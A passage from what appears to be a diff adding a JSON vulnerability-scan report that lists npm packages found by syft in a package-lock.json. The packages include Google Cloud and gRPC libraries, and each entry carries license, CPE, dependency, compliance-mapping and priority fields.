"ac959c0aec00c93e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @google-cloud/firestore 7.11.6", + "title": "@google-cloud/firestore 7.11.6", + "description": "Package discovered: @google-cloud/firestore 7.11.6", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "352073d173d9984f", + "name": "@google-cloud/firestore", + "version": "7.11.6", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:google:cloud_firestore:7.11.6:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/%40google-cloud/firestore@7.11.6", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@google-cloud/firestore/-/firestore-7.11.6.tgz", + "integrity": "sha512-EW/O8ktzwLfyWBOsNuhRoMi8lrC3clHM5LVFhGvO1HCsLozCOOXRAlHrYBoE6HL42Sc8yYMuCb2XqcnJ4OOEpw==", + "dependencies": { + "@opentelemetry/api": "^1.3.0", + "fast-deep-equal": "^3.1.1", + "functional-red-black-tree": "^1.0.1", + "google-gax": "^4.3.3", + "protobufjs": "^7.2.6" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f729f15026a15114", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @google-cloud/paginator 5.0.2", + "title": "@google-cloud/paginator 5.0.2", + "description": "Package discovered: @google-cloud/paginator 5.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e1f90862acd15bdd", + "name": "@google-cloud/paginator", + "version": "5.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@google-cloud\\/paginator:\\@google-cloud\\/paginator:5.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@google-cloud\\/paginator:\\@google_cloud\\/paginator:5.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@google_cloud\\/paginator:\\@google-cloud\\/paginator:5.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@google_cloud\\/paginator:\\@google_cloud\\/paginator:5.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@google:\\@google-cloud\\/paginator:5.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@google:\\@google_cloud\\/paginator:5.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40google-cloud/paginator@5.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@google-cloud/paginator/-/paginator-5.0.2.tgz", + "integrity": "sha512-DJS3s0OVH4zFDB1PzjxAsHqJT6sKVbRwwML0ZBP9PbU7Yebtu/7SWMRzvO2J3nUi9pRNITCfu4LJeooM2w4pjg==", + "dependencies": { + "arrify": "^2.0.0", + "extend": "^3.0.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "13de8663f3cca980", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @google-cloud/projectify 4.0.0", + "title": "@google-cloud/projectify 4.0.0", + "description": "Package discovered: @google-cloud/projectify 4.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "aae37aa20c3046f6", + "name": "@google-cloud/projectify", + "version": "4.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@google-cloud\\/projectify:\\@google-cloud\\/projectify:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@google-cloud\\/projectify:\\@google_cloud\\/projectify:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@google_cloud\\/projectify:\\@google-cloud\\/projectify:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@google_cloud\\/projectify:\\@google_cloud\\/projectify:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@google:\\@google-cloud\\/projectify:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@google:\\@google_cloud\\/projectify:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40google-cloud/projectify@4.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@google-cloud/projectify/-/projectify-4.0.0.tgz", + "integrity": "sha512-MmaX6HeSvyPbWGwFq7mXdo0uQZLGBYCwziiLIGq5JVX+/bdI3SAq6bP98trV5eTWfLuvsMcIC1YJOF2vfteLFA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f473f0a74b429a34", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @google-cloud/promisify 4.0.0", + "title": "@google-cloud/promisify 4.0.0", + "description": "Package discovered: @google-cloud/promisify 4.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "3927becf19e34873", + "name": "@google-cloud/promisify", + "version": "4.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@google-cloud\\/promisify:\\@google-cloud\\/promisify:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@google-cloud\\/promisify:\\@google_cloud\\/promisify:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@google_cloud\\/promisify:\\@google-cloud\\/promisify:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@google_cloud\\/promisify:\\@google_cloud\\/promisify:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@google:\\@google-cloud\\/promisify:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@google:\\@google_cloud\\/promisify:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40google-cloud/promisify@4.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@google-cloud/promisify/-/promisify-4.0.0.tgz", + "integrity": "sha512-Orxzlfb9c67A15cq2JQEyVc7wEsmFBmHjZWZYQMUyJ1qivXyMwdyNOs9odi79hze+2zqdTtu1E19IM/FtqZ10g==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "5c9bae4ce6812dd2", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @google-cloud/storage 7.19.0", + "title": "@google-cloud/storage 7.19.0", + "description": "Package discovered: @google-cloud/storage 7.19.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "cefeafe40657f94b", + "name": "@google-cloud/storage", + "version": "7.19.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@google-cloud\\/storage:\\@google-cloud\\/storage:7.19.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@google-cloud\\/storage:\\@google_cloud\\/storage:7.19.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@google_cloud\\/storage:\\@google-cloud\\/storage:7.19.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@google_cloud\\/storage:\\@google_cloud\\/storage:7.19.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@google:\\@google-cloud\\/storage:7.19.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@google:\\@google_cloud\\/storage:7.19.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40google-cloud/storage@7.19.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@google-cloud/storage/-/storage-7.19.0.tgz", + "integrity": "sha512-n2FjE7NAOYyshogdc7KQOl/VZb4sneqPjWouSyia9CMDdMhRX5+RIbqalNmC7LOLzuLAN89VlF2HvG8na9G+zQ==", + "dependencies": { + "@google-cloud/paginator": "^5.0.0", + "@google-cloud/projectify": "^4.0.0", + "@google-cloud/promisify": "<4.1.0", + "abort-controller": "^3.0.0", + "async-retry": "^1.3.3", + "duplexify": "^4.1.3", + "fast-xml-parser": "^5.3.4", + "gaxios": "^6.0.2", + "google-auth-library": "^9.6.3", + "html-entities": "^2.5.2", + "mime": "^3.0.0", + "p-limit": "^3.0.1", + "retry-request": "^7.0.0", + "teeny-request": "^9.0.0", + "uuid": "^8.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "596d6a964fdec768", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @grpc/grpc-js 1.14.3", + "title": "@grpc/grpc-js 1.14.3", + "description": "Package discovered: @grpc/grpc-js 1.14.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "3f87a56430ddd85e", + "name": "@grpc/grpc-js", + "version": "1.14.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:grpc:grpc:1.14.3:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/%40grpc/grpc-js@1.14.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@grpc/grpc-js/-/grpc-js-1.14.3.tgz", + "integrity": "sha512-Iq8QQQ/7X3Sac15oB6p0FmUg/klxQvXLeileoqrTRGJYLV+/9tubbr9ipz0GKHjmXVsgFPo/+W+2cA8eNcR+XA==", + "dependencies": { + "@grpc/proto-loader": "^0.8.0", + "@js-sdsl/ordered-map": "^4.4.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "feaff3ef7cf15262", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @grpc/proto-loader 0.7.15", + "title": "@grpc/proto-loader 0.7.15", + "description": "Package discovered: @grpc/proto-loader 0.7.15", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "05aac3d8e010493a", + "name": "@grpc/proto-loader", + "version": "0.7.15", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@grpc\\/proto-loader:\\@grpc\\/proto-loader:0.7.15:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@grpc\\/proto-loader:\\@grpc\\/proto_loader:0.7.15:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@grpc\\/proto_loader:\\@grpc\\/proto-loader:0.7.15:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@grpc\\/proto_loader:\\@grpc\\/proto_loader:0.7.15:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@grpc\\/proto:\\@grpc\\/proto-loader:0.7.15:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@grpc\\/proto:\\@grpc\\/proto_loader:0.7.15:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40grpc/proto-loader@0.7.15", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@grpc/proto-loader/-/proto-loader-0.7.15.tgz", + "integrity": "sha512-tMXdRCfYVixjuFK+Hk0Q1s38gV9zDiDJfWL3h1rv4Qc39oILCu1TRTDt7+fGUI8K4G1Fj125Hx/ru3azECWTyQ==", + "dependencies": { + "lodash.camelcase": "^4.3.0", + "long": "^5.0.0", + "protobufjs": "^7.2.5", + "yargs": "^17.7.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "81837b7c5203b82b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @grpc/proto-loader 0.8.0", + "title": "@grpc/proto-loader 0.8.0", + "description": "Package discovered: @grpc/proto-loader 0.8.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "1a954d92edb2b14f", + "name": "@grpc/proto-loader", + "version": "0.8.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@grpc\\/proto-loader:\\@grpc\\/proto-loader:0.8.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@grpc\\/proto-loader:\\@grpc\\/proto_loader:0.8.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@grpc\\/proto_loader:\\@grpc\\/proto-loader:0.8.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@grpc\\/proto_loader:\\@grpc\\/proto_loader:0.8.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@grpc\\/proto:\\@grpc\\/proto-loader:0.8.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@grpc\\/proto:\\@grpc\\/proto_loader:0.8.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40grpc/proto-loader@0.8.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@grpc/proto-loader/-/proto-loader-0.8.0.tgz", + "integrity": "sha512-rc1hOQtjIWGxcxpb9aHAfLpIctjEnsDehj0DAiVfBlmT84uvR0uUtN2hEi/ecvWVjXUGf5qPF4qEgiLOx1YIMQ==", + "dependencies": { + "lodash.camelcase": 